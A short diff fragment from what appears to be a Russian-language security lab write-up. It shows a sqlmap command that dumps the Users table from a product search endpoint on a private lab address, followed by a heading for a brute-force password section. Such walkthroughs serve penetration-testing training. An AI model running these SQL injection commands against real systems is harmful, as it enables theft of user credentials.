@ -401,10 +401,10 @@ python sqlmap.py -u http://10.5.143.101:PORT/rest/products/search?q= --tables
```ssh
python sqlmap.py -u http://10.5.143.101:PORT/rest/products/search?q= -T Users --dump
```
<image src="assets/L3_36">
</details>
### 2.3. Подбор пароля (Brute-force attack)